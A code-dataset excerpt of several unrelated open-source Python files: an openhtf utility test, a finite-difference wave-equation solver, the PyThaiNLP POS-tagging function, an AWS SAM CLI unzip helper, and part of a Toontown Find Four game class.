3a9a24987b2b34782fca55a8df8d007167dbb19a
|
refs/heads/master
| 2023-08-23T12:12:54.917649
| 2023-07-27T01:51:17
| 2023-07-27T01:51:43
| 41,519,483
| 471
| 253
|
Apache-2.0
| 2023-09-12T00:47:42
| 2015-08-28T01:14:17
|
Python
|
UTF-8
|
Python
| false
| false
| 2,571
|
py
|
util_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import time
import unittest
from unittest import mock
from openhtf import util
from openhtf.util import timeouts
class TestUtil(unittest.TestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.timeout = 60
self.polledtimeout = timeouts.PolledTimeout(self.timeout)
@mock.patch.object(time, 'time')
def test_time_expired_false(self, mock_time):
elapsed = 3
mock_time.side_effect = [1, 1 + elapsed, 2 + elapsed]
self.polledtimeout.restart()
sec = self.polledtimeout.seconds
self.assertLessEqual(sec, self.timeout - elapsed)
self.assertFalse(self.polledtimeout.has_expired())
def test_time_expired_true(self):
self.polledtimeout.expire()
self.assertTrue(self.polledtimeout.has_expired())
def test_partial_format(self):
original = ('Apples are {apple[color]} and {apple[taste]}. '
'Pears are {pear.color} and {pear.taste}. '
'Oranges are {orange_color} and {orange_taste}.')
text = copy.copy(original)
apple = {
'color': 'red',
'taste': 'sweet',
}
class Pear(object):
color = 'green'
taste = 'tart'
pear = Pear()
# Partial formatting
res = util.partial_format(text, apple=apple)
res = util.partial_format(res, pear=pear)
self.assertEqual(
'Apples are red and sweet. Pears are green and tart. '
'Oranges are {orange_color} and {orange_taste}.', res)
# Format rest of string
res = util.partial_format(res, orange_color='orange', orange_taste='sour')
self.assertEqual(
'Apples are red and sweet. Pears are green and tart. '
'Oranges are orange and sour.', res)
# The original text has not changed
self.assertEqual(original, text)
# Make sure no unexpected problems with an empty string
empty_string = ''
self.assertEqual('', util.partial_format(empty_string))
self.assertEqual('', util.partial_format(empty_string, foo='bar'))
|
1f679e9ba1f43f3795bba7c491967f40cde64ce6
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/Python_Scripting_for_Computational_Science_Third_Edition/py/examples/pde/wave1D_func5.py
|
52fd2124bb46cfb9e6c43b0fc0890227c7280792
|
[] |
no_license
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134
| 2023-08-14T10:05:37
| 2023-08-14T10:05:37
| 72,460,321
| 223
| 174
| null | 2022-10-24T12:15:06
| 2016-10-31T17:24:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 12,176
|
py
|
wave1D_func5.py
|
#!/usr/bin/env python
"""
As wave1D_func4.py, but the problem is formalized in terms of ODEs.
"""
from __future__ import division # disable integer division
from scitools.numpyutils import *
from CurveViz import *
def ic_scalar(u, x, I, U_0, U_L):
n = u.shape[0] - 1
t = 0
for i in iseq(0,n):
u[i] = I(x[i])
u[0] = U_0(t); u[n] = U_L(t)
return u
def scheme_scalar(rhs, u, c, f, x, t, n, dx):
C = (float(c)/dx)**2
for i in iseq(start=1, stop=n-1):
rhs[i] = C*(u[i-1] - 2*u[i] + u[i+1]) + f(x[i], t)
rhs[0] = 0 # assume U_0 and U_L are constant or linear in time!!!
rhs[n] = 0
return rhs
def scheme_vec(rhs, u, c, f, x, t, n, dx):
C = (float(c)/dx)**2
rhs[1:n] = C*(u[0:n-1] - 2*u[1:n] + u[2:n+1]) + f(x[1:n], t)
rhs[0] = 0 # assume U_0 and U_L are constant or linear in time!!!
rhs[n] = 0
return rhs
def Dirichlet_bc_scalar(up, U_0, U_L, t, n):
up[0] = U_0(t); up[n] = U_L(t)
return up
class WaveRHS:
"""
Wrapper for the scheme_* and bc_* functions such that
a ODE solver can call a "right-hand side" function with only
state and time as arguments. All other information are stored
as class attributes here, and __call__ and bc wraps calls to
the underlying straight functions where the actual numerics
is implemented.
"""
def __init__(self, *args):
self.rhs, self.u, self.c, self.f, self.x, \
self.n, self.dx, self.version, self.with_bc, \
self.U_0, self.U_L = args
if self.version == 'scalar':
self.scheme = scheme_scalar
elif self.version == 'vectorized':
self.scheme = scheme_vec
def __call__(self, u, t):
if self.with_bc:
# u (from ODESolver) contains boundary data
self.u = u
self.rhs = self.scheme(self.rhs, self.u, self.c, self.f,
self.x, t, self.n, self.dx)
return self.rhs
else:
# u does not contain boundary data, embed u in self.u
self.u[1:-1] = u
# insert bc:
self.u = self.bc(self.u, t) # may be extra work for constant bc...
self.rhs = self.scheme(self.rhs, self.u, self.c, self.f,
self.x, t, self.n, self.dx)
return self.rhs[1:-1] # only inner points enter ODE system
def bc(self, up, t):
return Dirichlet_bc_scalar(up, self.U_0, self.U_L, t, self.n)
def ODEStep(u, um, t, dt, F):
"""2nd order explicit scheme for u''=F(u,t)."""
up = 2*u - um + dt*dt*F(u, t)
return up
def ODEStep1(u, t, dt, F):
"""Special formula for 1st time step (u_t=0 as IC)."""
up = u + 0.5*dt*dt*F(u, t)
return up
class ODESolver:
def __init__(self, F, dt, u0,
user_action=None, user_action_args=[]):
self.F = F
self.dt = dt
self.user_action = user_action
self.user_action_args = user_action_args
# insert IC:
self.u = u0.copy()
self.um = zeros(len(self.u))
if self.u.shape != self.um.shape:
raise ValueError, 'incompatible shapes'
self.up = self.um.copy()
self.step = ODEStep
self.step1 = ODEStep1
def timeloop(self, tstop):
t = 0
if self.user_action is not None:
self.user_action(self.u, t, *self.user_action_args)
t_old = t; t += self.dt
if self.F.with_bc:
self.up = self.step1(self.u, t_old, self.dt, self.F)
else:
self.up[1:-1] = self.step1(self.u[1:-1], t_old, self.dt, self.F)
self.up = self.F.bc(self.up, t)
if self.user_action is not None:
self.user_action(self.up, t, *self.user_action_args)
# ready for next step:
self.um, self.u, self.up = self.u, self.up, self.um
time_step = 1
while t <= tstop:
t_old = t; t += self.dt
time_step += 1
if self.F.with_bc:
self.up = ODEStep(self.u, self.um, t_old, self.dt, self.F)
#if up[0] != 0 or up[-1] != 0:
print t, self.up[0], self.up[-1]
else:
self.up[1:-1] = ODEStep(self.u[1:-1], self.um[1:-1], t_old,
self.dt, self.F)
self.up = self.F.bc(self.up, t)
if self.user_action is not None:
self.user_action(self.up, t, *self.user_action_args)
# switch references for next step:
self.um, self.u, self.up = self.u, self.up, self.um
def solver(I, f, c, U_0, U_L, L, n, dt, tstop,
user_action=None, version='scalar'):
"""
Solve the wave equation u_tt=u_xx + f(x,t) on (0,L) with
u(0,t)=U_0(t), u(L,t)=U_L(t), for t=dt,2*dt,...,tstop
Initial conditions: u(x,0)=I(x), du/dt=0.
n is the total number of grid cells; grid points are numbered
from 0 to n.
dt is the time step. If dt<=0, the optimal time step
(dt=dx/c) is used.
tstop is the stop time for the simulation.
I, f, U_0, U_L are functions: I(x), f(x,t), U_0(t), U_L(t)
user_action is a function of (u, t, x) where the calling code
can add visualization, error computations, data analysis,
store solutions, etc.
This routine assumes that ODESolver is used to solve the ODEs
u_tt=F, where F is a class WaveRHS. (Should be parameter to this func!!!)
"""
import time
t0 = time.clock()
dx = L/float(n)
x = linspace(0, L, n+1) # grid points in x dir
if dt <= 0: dt = dx/float(c) # max time step?
u = zeros(n+1) # NumPy solution array
rhs = u.copy()
# set initial condition (pointwise - allows straight if-tests):
t = 0.0
u = ic_scalar(u, x, I, U_0, U_L)
with_bc = False #True
F = WaveRHS(rhs, u, c, f, x, n, dx, version, with_bc, U_0, U_L)
solver = ODESolver(F, dt, u, user_action, [x])
solver.timeloop(tstop)
t1 = time.clock()
return dt, x, t1-t0
def visualizer(I, f, c, U_0, U_L, L, n, dt, tstop,
user_action=None, version='scalar', graphics=None):
"""
Call solver but let the user_action funtion be a function
where the solution is visualized and stored in a list.
All arguments are passed on to the solver function,
except graphics. graphics is a plot object with the max/min
values of the y axis set in the calling code.
"""
solutions = [] # store all u fields at all time levels
def action_with_plot(u, t, x):
# note: nested function blocks may lead to
# mixing of scopes of variables - this might be tricky
if graphics is not None:
graphics.configure(coor=x)
graphics.plotcurve(u, legend='u(x,t=%9.4E)' % t, ps=0)
solutions.append(u.copy()) # save a copy!
if user_action is not None:
user_action(u, t) # call user's function
dt, x, cpu = solver(I, f, c, U_0, U_L, L, n, dt, tstop,
action_with_plot, version)
return solutions, x, dt, cpu
def test_solver_plug(plot=1, version='scalar', n=50):
L = 1
c = 1
tstop = 2
def I(x):
"""Plug profile as initial condition."""
if abs(x-L/2.0) > 0.1:
return 0
else:
return 1
def f(x,t):
return 0
def U_0(t):
return 0
def U_L(t):
return 0
def action(u, t, x):
pass
#print t, u
if plot:
g = graph(program='Gnuplot')
g.configure(ymin=-1.1, ymax=1.1)
else:
g = None
import time
t0 = time.clock()
solutions, x, dt, cpu = visualizer(I, f, c, U_0, U_L, L,
n, 0, tstop, user_action=None, version=version, graphics=g)
print 'CPU time: %s version =' % version, cpu
# check that first and last (if tstop=2) are equal:
if not allclose(solutions[0], solutions[-1],
atol=1.0E-10, rtol=1.0E-12):
print 'error in computations'
else:
print 'correct solution'
def test_solver1(N, version='scalar'):
"""
Very simple test case.
Store the solution at every N time level.
"""
def I(x): return sin(2*x*pi/L)
def f(x,t): return 0
solutions = []
# Need time_level_counter as global variable since
# it is assigned in the action function (that makes
# a variable local to that block otherwise).
# The manager class below provides a cleaner solution.
global time_level_counter
time_level_counter = 0
def action(u, t, x):
global time_level_counter
if time_level_counter % N == 0:
solutions.append(u.copy())
time_level_counter += 1
n = 100; tstop = 6; L = 10
dt, x, cpu = solver(I, f, 1.0, lambda t: 0, lambda t: 0,
L, n, 0, tstop,
user_action=action, version=version)
print 'CPU time:', cpu
print 'Max value in final u:', arrmax(solutions[-1])
class StoreSolution:
"""
Very simple test case.
Store the solution at every N time level.
"""
def __init__(self):
self.L = 10
def I(self, x): return sin(2*x*pi/self.L)
def f(self, x, t): return 0
def action(self, u, t, x):
if self.time_level_counter % self.N == 0:
self.solutions.append(u.copy())
self.time_level_counter += 1
def main(self, N=1, version='scalar'):
self.solutions = []
self.time_level_counter = 0
self.N = N
n = 6; tstop = 40
self.dt, self.x, self.cpu = \
solver(self.I, self.f, 1.0, lambda t: 0, lambda t: 0,
self.L, n, 0, tstop,
user_action=self.action, version=version)
def test_solver2(N, plot=True, version='scalar'):
s = StoreSolution()
s.main(N, version)
print 'CPU time:', s.cpu
if len(s.x) < 10: print s.solutions
if plot:
from CurveViz import graph
g = graph(program='Gnuplot', coor=s.x, ymax=1, ymin=-1)
for s in s.solutions:
g.plotcurve(s)
def test_solver1c(N, version='scalar'):
"""
As test_solver1, but use class for action function.
"""
def I(x): return sin(2*x*pi/L)
def f(x, t): return 0
class Action:
def __init__(self):
self.solutions = []
self.time_level_counter = 0
def __call__(self, u, x, t):
if self.time_level_counter % N == 0:
self.solutions.append(u.copy())
self.time_level_counter += 1
action = Action()
n = 100; tstop = 6; L = 10
dt, x, cpu = solver(I, f, 1.0, lambda t: 0, lambda t: 0,
L, n, 0, tstop,
user_action=action, version=version)
print 'CPU time:', cpu
print 'Max value in final u:', arrmax(action.solutions[-1])
class ExactSolution1:
def __init__(self):
self.L = 10
def exact(self, x, t):
m = 3.0
return cos(m*pi/self.L*t)*sin(m*pi/self.L*x)
def I(self, x): return self.exact(x, 0)
def f(self, x, t): return 0
def U_0(self, t): return self.exact(0, t)
def U_L(self, t): return self.exact(self.L, t)
def action(self, u, t, x):
e = u - self.exact(x, t)
self.errors.append(sqrt(dot(e,e))) # store norm of e
def main(self, n, version='scalar'):
self.errors = []
tstop = 10
self.dt, self.x, self.cpu = \
solver(self.I, self.f, 1.0, self.U_0,
lambda t: self.exact(self.L, t),
self.L, n, 0, tstop,
user_action=self.action, version=version)
def test_solver3(version='scalar'):
s = ExactSolution1()
s.main(5, version)
print 'Max error:', max(s.errors)
if __name__ == '__main__':
if len(sys.argv) < 2:
print """Usage %s test_solver_plug 1 "'vectorized'" """ % \
sys.argv[0]
sys.exit(0)
cmd = '%s(%s)' % (sys.argv[1], ', '.join(sys.argv[2:]))
print cmd
exec(cmd)
|
59e118c7dcb6b8b6ba205483a8aea95756de88d7
|
b8c1ee67d1e770ca0a49771751df8cef6a5b6935
|
/pythainlp/tag/pos_tag.py
|
90a0d778862bd8e8a56b939e910aebae419ce25a
|
[
"Apache-2.0",
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"CC-BY-4.0"
] |
permissive
|
PyThaiNLP/pythainlp
|
2922c6e4723f1828d39793eb722dc163d141c4f2
|
43cd4f8029d2d9b0d3fd1e4cc30faab7e8052eeb
|
refs/heads/dev
| 2023-09-04T03:42:44.488153
| 2023-08-20T04:10:28
| 2023-08-20T04:10:28
| 61,813,823
| 761
| 264
|
Apache-2.0
| 2023-08-20T04:10:30
| 2016-06-23T14:57:26
|
Python
|
UTF-8
|
Python
| false
| false
| 7,618
|
py
|
pos_tag.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016-2023 PyThaiNLP Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Tuple
def pos_tag(
words: List[str], engine: str = "perceptron", corpus: str = "orchid"
) -> List[Tuple[str, str]]:
"""
Marks words with part-of-speech (POS) tags, such as 'NOUN' and 'VERB'.
:param list words: a list of tokenized words
:param str engine:
* *perceptron* - perceptron tagger (default)
* *unigram* - unigram tagger
* *wangchanberta* - wangchanberta model.
* *tltk* - TLTK: Thai Language Toolkit (support TNC corpus only.\
if you choose other corpus, It's change to TNC corpus.)
:param str corpus: the corpus that used to create the language model for tagger
* *orchid* - `ORCHID \
<https://www.academia.edu/9127599/Thai_Treebank>`_ corpus, \
text from Thai academic articles (default)
* *orchid_ud* - ORCHID text, with tags mapped to Universal POS tags
* *blackboard* - `blackboard treebank <https://bitbucket.org/kaamanita/blackboard-treebank/src/master/>`_
* *blackboard_ud* - blackboard text, with tags mapped to Universal POS tag \
from `Universal Dependencies <https://universaldependencies.org/>`
* *pud* - `Parallel Universal Dependencies (PUD)\
<https://github.com/UniversalDependencies/UD_Thai-PUD>`_ \
treebanks, natively use Universal POS tags
* *tnc* - Thai National Corpus (support tltk engine only)
:return: a list of tuples (word, POS tag)
:rtype: list[tuple[str, str]]
:Example:
Tag words with corpus `orchid` (default)::
from pythainlp.tag import pos_tag
words = ['ฉัน','มี','ชีวิต','รอด','ใน','อาคาร','หลบภัย','ของ', \\
'นายก', 'เชอร์ชิล']
pos_tag(words)
# output:
# [('ฉัน', 'PPRS'), ('มี', 'VSTA'), ('ชีวิต', 'NCMN'), ('รอด', 'NCMN'),
# ('ใน', 'RPRE'), ('อาคาร', 'NCMN'), ('หลบภัย', 'NCMN'),
# ('ของ', 'RPRE'), ('นายก', 'NCMN'), ('เชอร์ชิล', 'NCMN')]
Tag words with corpus `orchid_ud`::
from pythainlp.tag import pos_tag
words = ['ฉัน','มี','ชีวิต','รอด','ใน','อาคาร','หลบภัย','ของ', \\
'นายก', 'เชอร์ชิล']
pos_tag(words, corpus='orchid_ud')
# output:
# [('ฉัน', 'PROPN'), ('มี', 'VERB'), ('ชีวิต', 'NOUN'),
# ('รอด', 'NOUN'), ('ใน', 'ADP'), ('อาคาร', 'NOUN'),
# ('หลบภัย', 'NOUN'), ('ของ', 'ADP'), ('นายก', 'NOUN'),
# ('เชอร์ชิล', 'NOUN')]
Tag words with corpus `pud`::
from pythainlp.tag import pos_tag
words = ['ฉัน','มี','ชีวิต','รอด','ใน','อาคาร','หลบภัย','ของ', \\
'นายก', 'เชอร์ชิล']
pos_tag(words, corpus='pud')
# [('ฉัน', 'PRON'), ('มี', 'VERB'), ('ชีวิต', 'NOUN'), ('รอด', 'VERB'),
# ('ใน', 'ADP'), ('อาคาร', 'NOUN'), ('หลบภัย', 'NOUN'),
# ('ของ', 'ADP'), ('นายก', 'NOUN'), ('เชอร์ชิล', 'PROPN')]
Tag words with different engines including *perceptron* and *unigram*::
from pythainlp.tag import pos_tag
words = ['เก้าอี้','มี','จำนวน','ขา', ' ', '=', '3']
pos_tag(words, engine='perceptron', corpus='orchid')
# output:
# [('เก้าอี้', 'NCMN'), ('มี', 'VSTA'), ('จำนวน', 'NCMN'),
# ('ขา', 'NCMN'), (' ', 'PUNC'),
# ('=', 'PUNC'), ('3', 'NCNM')]
pos_tag(words, engine='unigram', corpus='pud')
# output:
# [('เก้าอี้', None), ('มี', 'VERB'), ('จำนวน', 'NOUN'), ('ขา', None),
# ('<space>', None), ('<equal>', None), ('3', 'NUM')]
"""
if not words:
return []
_support_corpus = [
"blackboard",
"blackboard_ud",
"orchid",
"orchid_ud",
"pud",
]
if engine == "perceptron" and corpus in _support_corpus:
from pythainlp.tag.perceptron import tag as tag_
elif engine == "tltk":
from pythainlp.tag.tltk import pos_tag as tag_
corpus = "tnc"
elif engine == "unigram" and corpus in _support_corpus: # default
from pythainlp.tag.unigram import tag as tag_
else:
raise ValueError(
"pos_tag not support {0} engine or {1} corpus.".format(
engine, corpus
)
)
word_tags = tag_(words, corpus=corpus)
return word_tags
def pos_tag_sents(
sentences: List[List[str]],
engine: str = "perceptron",
corpus: str = "orchid",
) -> List[List[Tuple[str, str]]]:
"""
Marks sentences with part-of-speech (POS) tags.
:param list sentences: a list of lists of tokenized words
:param str engine:
* *perceptron* - perceptron tagger (default)
* *unigram* - unigram tagger
* *tltk* - TLTK: Thai Language Toolkit (support TNC corpus only.\
if you choose other corpus, It's change to TNC corpus.)
:param str corpus: the corpus that used to create the language model for tagger
* *orchid* - `ORCHID \
<https://www.academia.edu/9127599/Thai_Treebank>`_ corpus, \
text from Thai academic articles (default)
* *orchid_ud* - ORCHID text, with tags mapped to Universal POS tags
* *blackboard* - `blackboard treebank <https://bitbucket.org/kaamanita/blackboard-treebank/src/master/>`_
* *blackboard_ud* - blackboard text, with tags mapped to Universal POS tag \
from `Universal Dependencies <https://universaldependencies.org/>`
* *pud* - `Parallel Universal Dependencies (PUD)\
<https://github.com/UniversalDependencies/UD_Thai-PUD>`_ \
treebanks, natively use Universal POS tags
* *tnc* - Thai National Corpus (support tltk engine only)
:return: a list of lists of tuples (word, POS tag)
:rtype: list[list[tuple[str, str]]]
:Example:
Labels POS for two sentences::
from pythainlp.tag import pos_tag_sents
sentences = [['เก้าอี้','มี','3','ขา'], \\
['นก', 'บิน', 'กลับ', 'รัง']]
pos_tag_sents(sentences, corpus='pud)
# output:
# [[('เก้าอี้', 'PROPN'), ('มี', 'VERB'), ('3', 'NUM'),
# ('ขา', 'NOUN')], [('นก', 'NOUN'), ('บิน', 'VERB'),
# ('กลับ', 'VERB'), ('รัง', 'NOUN')]]
"""
if not sentences:
return []
return [pos_tag(sent, engine=engine, corpus=corpus) for sent in sentences]
|
1fd73119e18169a82a74f68820234197bfd95881
|
10cb11f83e1c8b51b9d72c28d6259a56ff1a97c8
|
/samcli/local/lambdafn/zip.py
|
05c6aa0eb2b7658639a97cfebb7ec11704021ffb
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"BSD-2-Clause"
] |
permissive
|
aws/aws-sam-cli
|
6d4411aacf7f861e75e5cf4882a32858797a276d
|
b297ff015f2b69d7c74059c2d42ece1c29ea73ee
|
refs/heads/develop
| 2023-08-30T23:28:36.179932
| 2023-08-30T21:58:26
| 2023-08-30T21:58:26
| 92,205,085
| 1,402
| 470
|
Apache-2.0
| 2023-09-14T21:14:23
| 2017-05-23T18:16:23
|
Python
|
UTF-8
|
Python
| false
| false
| 4,247
|
py
|
zip.py
|
"""
Helper methods to unzip an archive preserving the file permissions. Python's zipfile module does not yet support
this feature natively (https://bugs.python.org/issue15795).
"""
import logging
import os
import zipfile
LOG = logging.getLogger(__name__)
S_IFLNK = 0xA
def _is_symlink(file_info):
"""
Check the upper 4 bits of the external attribute for a symlink.
See: https://unix.stackexchange.com/questions/14705/the-zip-formats-external-file-attribute
Parameters
----------
file_info : zipfile.ZipInfo
The ZipInfo for a ZipFile
Returns
-------
bool
A response regarding whether the ZipInfo defines a symlink or not.
"""
return (file_info.external_attr >> 28) == 0xA # noqa: PLR2004
def _extract(file_info, output_dir, zip_ref):
"""
Unzip the given file into the given directory while preserving file permissions in the process.
Parameters
----------
file_info : zipfile.ZipInfo
The ZipInfo for a ZipFile
output_dir : str
Path to the directory where the it should be unzipped to
zip_ref : zipfile.ZipFile
The ZipFile we are working with.
Returns
-------
string
Returns the target path the Zip Entry was extracted to.
"""
# Handle any regular file/directory entries
if not _is_symlink(file_info):
return zip_ref.extract(file_info, output_dir)
source = zip_ref.read(file_info.filename).decode("utf8")
link_name = os.path.normpath(os.path.join(output_dir, file_info.filename))
# make leading dirs if needed
leading_dirs = os.path.dirname(link_name)
if not os.path.exists(leading_dirs):
os.makedirs(leading_dirs)
# If the link already exists, delete it or symlink() fails
if os.path.lexists(link_name):
os.remove(link_name)
# Create a symbolic link pointing to source named link_name.
os.symlink(source, link_name)
return link_name
def unzip(zip_file_path, output_dir, permission=None):
"""
Unzip the given file into the given directory while preserving file permissions in the process.
Parameters
----------
zip_file_path : str
Path to the zip file
output_dir : str
Path to the directory where the it should be unzipped to
permission : int
Permission to set in an octal int form
"""
with zipfile.ZipFile(zip_file_path, "r") as zip_ref:
# For each item in the zip file, extract the file and set permissions if available
for file_info in zip_ref.infolist():
extracted_path = _extract(file_info, output_dir, zip_ref)
# If the extracted_path is a symlink, do not set the permissions. If the target of the symlink does not
# exist, then os.chmod will fail with FileNotFoundError
if not os.path.islink(extracted_path):
_set_permissions(file_info, extracted_path)
_override_permissions(extracted_path, permission)
if not os.path.islink(extracted_path):
_override_permissions(output_dir, permission)
def _override_permissions(path, permission):
"""
Forcefully override the permissions on the path
Parameters
----------
path str
Path where the file or directory
permission octal int
Permission to set
"""
if permission:
os.chmod(path, permission)
def _set_permissions(zip_file_info, extracted_path):
"""
Sets permissions on the extracted file by reading the ``external_attr`` property of given file info.
Parameters
----------
zip_file_info : zipfile.ZipInfo
Object containing information about a file within a zip archive
extracted_path : str
Path where the file has been extracted to
"""
# Permission information is stored in first two bytes.
permission = zip_file_info.external_attr >> 16
if not permission:
# Zips created on certain Windows machines, however, might not have any permission information on them.
# Skip setting a permission on these files.
LOG.debug("File %s in zipfile does not have permission information", zip_file_info.filename)
return
os.chmod(extracted_path, permission)
|
bc7b8bd2bda6d2f23083a19063bd5c1b985df7fe
|
da1721d2783ea4d67ff4e73cee6eee71292f2ef7
|
/toontown/safezone/DistributedFindFour.py
|
c43ac0920dbe5f5567fe7adbe6bbfa926d4445d0
|
[
"BSD-3-Clause"
] |
permissive
|
open-toontown/open-toontown
|
bbdeb1b7bf0fb2861eba2df5483738c0112090ca
|
464c2d45f60551c31397bd03561582804e760b4a
|
refs/heads/develop
| 2023-07-07T01:34:31.959657
| 2023-05-30T23:49:10
| 2023-05-30T23:49:10
| 219,221,570
| 143
| 104
|
BSD-3-Clause
| 2023-09-11T09:52:34
| 2019-11-02T22:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 33,793
|
py
|
DistributedFindFour.py
|
from panda3d.core import *
from panda3d.otp import WhisperPopup
from direct.distributed.ClockDelta import *
from direct.task.Task import Task
from direct.interval.IntervalGlobal import *
from .TrolleyConstants import *
from direct.gui.DirectGui import *
from toontown.toonbase import TTLocalizer
from direct.distributed import DistributedNode
from direct.distributed.ClockDelta import globalClockDelta
from .ChineseCheckersBoard import ChineseCheckersBoard
from direct.fsm import ClassicFSM, State
from direct.fsm import StateData
from toontown.toonbase.ToontownTimer import ToontownTimer
from toontown.toonbase import ToontownGlobals
from direct.distributed.ClockDelta import *
from otp.otpbase import OTPGlobals
from direct.showbase import PythonUtil
from random import *
class DistributedFindFour(DistributedNode.DistributedNode):
def __init__(self, cr):
NodePath.__init__(self, 'DistributedFindFour')
DistributedNode.DistributedNode.__init__(self, cr)
self.cr = cr
self.reparentTo(render)
self.boardNode = loader.loadModel('phase_6/models/golf/findfour_game.bam')
self.boardNode.reparentTo(self)
self.board = [[0,
0,
0,
0,
0,
0,
0],
[0,
0,
0,
0,
0,
0,
0],
[0,
0,
0,
0,
0,
0,
0],
[0,
0,
0,
0,
0,
0,
0],
[0,
0,
0,
0,
0,
0,
0],
[0,
0,
0,
0,
0,
0,
0]]
self.exitButton = None
self.inGame = False
self.waiting = True
self.startButton = None
self.playerNum = None
self.turnText = None
self.isMyTurn = False
self.wantTimer = True
self.leaveButton = None
self.screenText = None
self.turnText = None
self.exitButton = None
self.numRandomMoves = 0
self.blinker = Sequence()
self.playersTurnBlinker = Sequence()
self.yourTurnBlinker = Sequence()
self.winningSequence = Sequence()
self.moveSequence = Sequence()
self.moveList = []
self.mySquares = []
self.playerSeats = None
self.moveCol = None
self.move = None
self.accept('mouse1', self.mouseClick)
self.traverser = base.cTrav
self.pickerNode = CollisionNode('mouseRay')
self.pickerNP = camera.attachNewNode(self.pickerNode)
self.pickerNode.setFromCollideMask(BitMask32(4096))
self.pickerRay = CollisionRay()
self.pickerNode.addSolid(self.pickerRay)
self.myHandler = CollisionHandlerQueue()
self.traverser.addCollider(self.pickerNP, self.myHandler)
self.buttonModels = loader.loadModel('phase_3.5/models/gui/inventory_gui')
self.upButton = self.buttonModels.find('**//InventoryButtonUp')
self.downButton = self.buttonModels.find('**/InventoryButtonDown')
self.rolloverButton = self.buttonModels.find('**/InventoryButtonRollover')
self.clockNode = ToontownTimer()
self.clockNode.setPos(1.16, 0, -0.83)
self.clockNode.setScale(0.3)
self.clockNode.hide()
self.tintConstant = Vec4(0.25, 0.25, 0.25, 0)
self.ghostConstant = Vec4(0, 0, 0, 0.5)
self.knockSound = base.loader.loadSfx('phase_5/audio/sfx/GUI_knock_1.ogg')
self.clickSound = base.loader.loadSfx('phase_3/audio/sfx/GUI_balloon_popup.ogg')
self.moveSound = base.loader.loadSfx('phase_6/audio/sfx/CC_move.ogg')
self.accept('stoppedAsleep', self.handleSleep)
from direct.fsm import ClassicFSM, State
self.fsm = ClassicFSM.ClassicFSM('ChineseCheckers', [State.State('waitingToBegin', self.enterWaitingToBegin, self.exitWaitingToBegin, ['playing', 'gameOver']), State.State('playing', self.enterPlaying, self.exitPlaying, ['gameOver']), State.State('gameOver', self.enterGameOver, self.exitGameOver, ['waitingToBegin'])], 'waitingToBegin', 'waitingToBegin')
startLoc = self.boardNode.find('**/locators')
self.locatorList = startLoc.getChildren()
self.startingPositions = self.locatorList.pop(0)
self.startingPositions = self.startingPositions.getChildren()
instancePiece = self.boardNode.find('**/pieces')
tempList = []
for x in range(7):
self.startingPositions[x].setTag('StartLocator', '%d' % x)
collNode = CollisionNode('startpicker%d' % x)
collNode.setIntoCollideMask(BitMask32(4096))
tempList.append(self.startingPositions[x].attachNewNode(collNode))
tempList[x].node().addSolid(CollisionTube(0, 0, 0.23, 0, 0, -.23, 0.2))
for z in self.startingPositions:
y = instancePiece.copyTo(z)
for val in y.getChildren():
val.hide()
tempList = []
for x in range(42):
self.locatorList[x].setTag('GamePeiceLocator', '%d' % x)
collNode = CollisionNode('startpicker%d' % x)
collNode.setIntoCollideMask(BitMask32(4096))
tempList.append(self.locatorList[x].attachNewNode(collNode))
tempList[x].node().addSolid(CollisionSphere(0, 0, 0, 0.2))
for z in self.locatorList:
y = instancePiece.copyTo(z)
for val in y.getChildren():
val.hide()
dummyHide = instancePiece.getParent().attachNewNode('DummyHider')
instancePiece.reparentTo(dummyHide)
dummyHide.hide()
return
def setName(self, name):
self.name = name
def announceGenerate(self):
DistributedNode.DistributedNode.announceGenerate(self)
if self.table.fsm.getCurrentState().getName() != 'observing':
if base.localAvatar.doId in self.table.tableState:
self.seatPos = self.table.tableState.index(base.localAvatar.doId)
if self.seatPos <= 2:
for x in self.startingPositions:
x.setH(0)
for x in self.locatorList:
x.setH(0)
else:
for x in self.startingPositions:
x.setH(180)
for x in self.locatorList:
x.setH(180)
self.moveCameraForGame()
else:
self.seatPos = self.table.seatBumpForObserve
if self.seatPos > 2:
for x in self.startingPositions:
x.setH(180)
for x in self.locatorList:
x.setH(180)
self.moveCameraForGame()
def handleSleep(self, task = None):
if self.fsm.getCurrentState().getName() == 'waitingToBegin':
self.exitButtonPushed()
if task != None:
task.done
return
def setTableDoId(self, doId):
self.tableDoId = doId
self.table = self.cr.doId2do[doId]
self.table.setTimerFunc(self.startButtonPushed)
self.fsm.enterInitialState()
self.table.setGameDoId(self.doId)
def disable(self):
DistributedNode.DistributedNode.disable(self)
if self.leaveButton:
self.leaveButton.destroy()
self.leavebutton = None
if self.screenText:
self.screenText.destroy()
self.screenText = None
if self.turnText:
self.turnText.destroy()
self.turnText = None
self.clockNode.stop()
self.clockNode.hide()
self.ignore('mouse1')
self.ignore('stoppedAsleep')
self.fsm = None
taskMgr.remove('playerTurnTask')
return
def delete(self):
DistributedNode.DistributedNode.delete(self)
self.table.gameDoId = None
self.table.game = None
if self.exitButton:
self.exitButton.destroy()
if self.startButton:
self.startButton.destroy()
self.clockNode.stop()
self.clockNode.hide()
self.table.startButtonPushed = None
self.ignore('mouse1')
self.ignore('stoppedAsleep')
self.fsm = None
self.table = None
self.winningSequence.finish()
